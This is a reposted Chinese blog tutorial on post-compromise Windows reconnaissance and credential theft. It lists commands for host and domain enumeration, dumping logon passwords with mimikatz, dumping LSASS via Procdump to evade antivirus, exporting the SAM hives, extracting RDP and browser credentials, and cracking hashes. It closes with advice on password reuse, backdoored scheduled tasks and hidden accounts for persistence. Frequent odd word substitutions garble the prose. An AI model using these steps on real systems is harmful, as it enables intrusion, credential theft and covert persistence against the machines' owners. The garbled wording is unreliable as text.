天空闲话 发表于 2024-10-21 06:02:59

内网渗透-内网信息网络

目录

[*]Windows本地基础信息网络

[*]权限检察
[*]指定用户的详细信息
[*]检察防火墙状态
[*]机器基础信息

[*]检察系统信息

[*]检察进程环境
[*]软件安装环境
[*]检察计划使命

[*]网络环境

[*]检察网络配置信息
[*]检察网络连接环境
[*]检察是否存在域
[*]扫描网段

[*]WMIC网络信息

[*]抓本地暗码

[*]LaZagne抓暗码
[*]mimikatz 抓暗码

[*]mimikatz提权获取暗码
[*]mimikatz+Procdump离线获取暗码

[*]SAMInside获取暗码

[*]原理
[*]SAMInside

[*]RDP凭证抓取
[*]彩虹表 破解暗码

[*]原理

[*]浏览器暗码

[*]ChromePass
[*]WebBrowserPassView


[*]Windows信息网络总结


Windows本地基础信息网络

注:本机信息网络可以网络到敏感信息,别的用网络到的信息举行提权拿下服务器,然后另有方便横向移动扩大战果,比如内网中为了维护方便有很多暗码都是通用的,但是本机信息网络方式太多,这里就只是介绍本人平时最常网络的一些方式。
背景:起首通过webshell大概其他方式拿下了一台机器,并且存在内网环境,这时候我们就要准备举行内网渗透了。但是内网渗透之前需要对本地机器举行信息网络,才能够更好的举行内网渗透。
权限检察

作用:是否需要举行提权
whoami
whoami /all指定用户的详细信息

作用:多个用户多条路,拿到暗码多试。
加上/domain的话可以判断是否存在域,查询的用户不是域的话就会报错
当然了你查询一个不存在的用户也是会报错,所以建议先用net user 用户名先检察一下你输入的用户名是否存在
#先搜索用户账户名
wmic useraccount list brief | more

net user 用户名
net user 用户名 /domain检察防火墙状态

netsh advfirewall show allprofiles机器基础信息

版本、补丁、服务、使命、防护等
检察系统信息


[*]操作系统的详细配置信息
这个可以看到操作系统版本、补丁、网卡环境等等
systeminfo
[*]检察操作系统的架构
作用:通过该信息可以有针对性的上传攻击工具
echo %PROCESSOR_ARCHITECTURE%
检察进程环境

作用:可以通过进程列表判断是否存在杀软,留到网站上举行匹配即可。
tasklist 可以自己搭建杀软网站来匹配
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000508950-864032836.png
软件安装环境

作用:检察有没有一些第三方工具可以进一步留后门或提权的
检察系统安装的软件与版本信息
cmd输入以下下令,假如是powershell的话输入双引号里面的下令即可。
powershell "Get-WmiObject -class Win32_Product | Select-Object -Property name,version"

个人建议使用wmic执行速度比较快
    wmic product get name,version
或者详细一点
wmic product list brief | more#因为比较信息比较多所以使用more检察计划使命

作用:可能会看到一些敏感信息,比如需要对某些机器举行交互可能会看到暗码之类的定时使命脚本等等
schtasks

#更详细的信息
schtasks /query /fo LIST /v网络环境

检察网络配置信息

加上/all参数可以检察到是否存在域
ipconfig /all检察网络连接环境

作用:可能会发现内网数据库连接之类的环境
netstat -ano检察是否存在域

检察域的名
#不存在域的话该命令会报错(测试过好像不管你登录的时不时域成员,只要机器加入了域就不会报错,)
net view /domain

#还有其他可以看到是否存在域的情况,面试可能会经常遇到,实战中只其实只需要知道一个即可,一般来说不会连这种命令都禁用。
#下面中个人最推荐和最常用ipconfig,应该没人都给你禁用了吧,每个windows系统几乎都能用这个命令吧
ipconfig /all#判断存在域,看DNS后缀
systeminfo #会列出所处的域
net config workstation #查看"工作站域"中显示 登录组 还是 域,是域的话会显示你登录的域名判断域控主机
net time /domain #不在域环境中或者不是域成员登录进来的会报错
nslookup 域名#定位域控主机的IP地址直接检察域和定位域控主机ip
wmic ntdomain list brief#这个命令在winserver2003用不了
ping 域名
nslookup 域名更多域相关知识在域渗透部分详细说。
扫描网段

这里有很多方法
1.直接使用系统命令 | 这里可以使用网上现成的命令或者bat、ps1、shell脚本
2.python脚本
3.上传nmap
4.cs、msf上线扫描网段
等等WMIC网络信息

上述基础信息检察也可以通过wmic来举行信息网络。
WMIC可以描述为一组管理Windows系统的方法和功能。
我们可以把它当作API来与Windows系统举行相互交流,Wmic在渗透测试中的价值在于它不需要下载和安装,由于wmic是Windows系统自带的功能,而且整个运行都载计算机的内存中发生,不会留下任何陈迹,能用WMIC网络的话只管用这个就行了其实,自带的还不用上传工具过去。
假如你要获取某几个列的数据只需要,比如获取startup的 command,caption列:wmic startup get command,caption ,
而获取全部的是下令:wmic startup list brief,即list 都是列出全部的意思。
#检索系统已安装的软件
wmic product list brief | more
或者
wmic product get name,version

#检索系统运行的服务
wmic service list brief | more

#搜索查看进程信息
wmic process list brief | more

#搜索启动程序
wmic startup list brief | more
或者
wmic startup get command,caption

#搜索共享驱动盘
wmic netuse list brief | more

#搜索用户账户
wmic useraccount list brief | more

#搜索计算机域控制器
wmic ntdomain list brief

#搜索登录用户
wmic logon list brief | more

#搜索已安装的安全更新
wmic qfe list brief | more抓本地暗码

抓到的hash暗码都能丢到在线网站去查一下:https://www.cmd5.com/
LaZagne抓暗码

若这个工具执行不了的话,就是无法提权,需要有管理员权限执行才行。
LaZagne跨平台,支持linux、mac
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000508878-1364410436.png
参考文章:https://www.freebuf.com/articles/database/355888.html
输出参数:
-oN代表普通文本
-oJ代表JSON
-oA代表全部启动模块
启动所有模块:LaZagne.exe all

启动一个指定的模块:laZagne.exe browsers

启动一个指定的软件脚本:laZagne.exe browsers -firefox模式参数
-vv #详细模式
-quiet #静音模式解密域凭证建议指定用户Windows暗码,否则工具将实验全部已找到的Windows暗码
laZagne.exe all -password ZapataVive常用下令
laZagne.exe all -oNmimikatz 抓暗码

mimikatz提权获取暗码

privilege::debug#进入debug模式

sekurlsa::logonpasswords#获取密码mimikatz+Procdump离线获取暗码

由于procdump是微软开辟的,白名单软件不会被杀掉,所以用该软件导出数,接着传回我们自己的hacker机器上利用mimkatz抓暗码就可以 了,不用担心mimikatz被杀
Procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp"

sekurlsa::logonpasswordsSAMInside获取暗码

原理

Saminside是一个暴力破解工具,可以通过读取本地帐户的lmhash值,对hash值进行暴力破解,从而得到真正的登录密码。SAMInside

1.目的服务器导出SAM和SYSTEM或SYSKEY文件
2.通常是不能直接导出的,所以最好是通过下令窗口导出指定位置
reg save hklm\sam C:/sam
reg save hklm\system C:/system.key
reg save hklm\security C:/security3.然后打开SAMInside选择导入
导入顺序:sam->system.key->security
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509062-818347497.png
但是我利用windows10没有实验成功。
RDP凭证抓取

mimikatz抓取
1.起首下令行输入下面这句,先获取到对应的登录记录文件,文件名就是对应的值
dir /a %userprofile%\appdata\local\microsoft\credentials\*2.假如上面你有发现确实存在对应的记录文件的话就可以利用mimikatz来解密了
(这里我实验过将上面dir列出来的Credentials值文件复制出来,失败了,所以还是要上传mimikatz到目的服务器去解密)
mimikatz.exe "dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\Credentials值" exit3.获取guidMasterKey,要记得guidMasterKey是什么值,下一步要用
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" > cerd.txthttps://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509100-1826808603.png
4.mimikatz利用DPAPI 模块从内存中读取主密钥
mimikatz.exe "privilege::debug" "sekurlsa::dpapi"

#建议复制到文本中查找对应的guidMasterKey值,然后找对应他的MasterKey
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" > cerd.txthttps://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509043-1288137440.png
5.查找guid对应的MasterKey(下面是完整的,不要删除任何一个空格)
mimikatz.exe "dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\ Credentials值/masterkey:masterkey值" exithttps://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509023-584242387.png
我这里失败了,具体原因不知道,可能是我没有利用rdp服务吧,但步骤就是这么个步骤了。
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509330-1418466434.png
彩虹表 破解暗码

原理

通过预先计算的hash散列链集合对来反推明文,因为在一个对中,其中的算法是固定的,所以只需要重复加密函数即可还原这个散列链,即头和尾知道了,比如:1:11,这中间的算法是+1,+4,那么这个hash链就是:`1-2-6-7-11`,因为是+1 +4,所以中间还原的链数据就是`2 6 7`,也就是说我们使用一个对就存储了5个值或者更多,这里仅仅只是举一个例子而已,具体+1+4要循环多少次还要看k参数。

所以利用这个彩虹表去获取密码就会比较快速。
吐槽:其实常规点的hash密码丢到在线网站上直接就出来了,很少用彩虹表。抓hash工具很多,可以是Procdump、pwdump等等,这里就用pwdump。
通过抓取到的hash,放到ophcrack https://ophcrack.sourceforge.io/工具上,用网络到的彩虹表https://www.freerainbowtables.com/
下载好接纳表后,用ophcrack 加载数据
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509464-376822406.png
点击install后会让你选择你的彩虹表文件夹
彩虹表的数据如下
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509452-278678322.png
加载完成后你拿到的hash解不出来就可以丢到工具中看能不能撞出来
比如我这里利用pwdump8.exe拿到hash暗码
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509368-2112589644.png
然后随便复制丢到工具中点击crack,我这里是一个一个的复制进去,你也可以通过其他load方式
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509518-1069528371.png
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509350-1032644716.png
浏览器暗码

参考文章:https://cloud.tencent.com/developer/article/2204689
下面下载工具可能会报毒,你到官网下载也是一样,只管开一个免杀目录大概关闭杀软
这里无脑用工具即可,附上网盘下载地点(注意解压的暗码):https://pan.baidu.com/s/1IGwstSUrSWdZv3pJ5baacQ?pwd=ihof
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509480-1970398813.png
也可以到官网下载:
https://www.nirsoft.net/password_recovery_tools.html
按照下面的方式下载工具包即可注意解压的暗码
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509690-1942653957.png
ChromePass

双击打开即可看到暗码了,厚码附上
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509528-1181912716.png
WebBrowserPassView

可以利用下令行模式举行生存暗码,在无法远程控制的时候利用下令举措静比较小
参数可以看操作指南
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509317-104192408.png
这里就生存为/stext文本文件,同样暗码出来了,十分可怕。
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509455-685427471.png
双击打开也是能直接看到浏览器泄漏的暗码,十分可怕,这还真用我自己的浏览器缓存打开的。
https://img2024.cnblogs.com/blog/3392862/202410/3392862-20241021000509347-956927778.png
Windows信息网络总结

简单总结一下平时拿到主机后本人会做什么
(总结不全,但最终目的是为了扩大战果)
内网信息收集
先看权限
systeminfo系统信息、补丁信息等等
进程、服务、软件安装情况、计划任务
查看内网网络环境、网络连接情况,判断下是否需要做内网穿透
判断是否存在域环境
然后就可以扫内网网段探测存活主机
收集本机各种密码,如果是域控主机等等之类在同一环境下用同一密码都是很有可能的
收集一下rdp密码、用工具导出本地hash进行破解
如果拿到的机器是个人电脑可以尝试抓取本地浏览器密码
net user看下有哪些用户,拿着收集到的密码一个个尝试
拿下机器后如果需要持久化控制的话可以留后门,那么我们信息收集部分拿到的一些比如计划任务脚本也可以注入自己的恶意代码或者直接写一个定时任务脚本,脚本也可以进行文件隐藏、做隐藏账户或者克隆账户,这里其实可以借鉴病毒留后门的方法。

以上收集到的信息最好是开一个文档保存下来。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 内网渗透-内网信息网络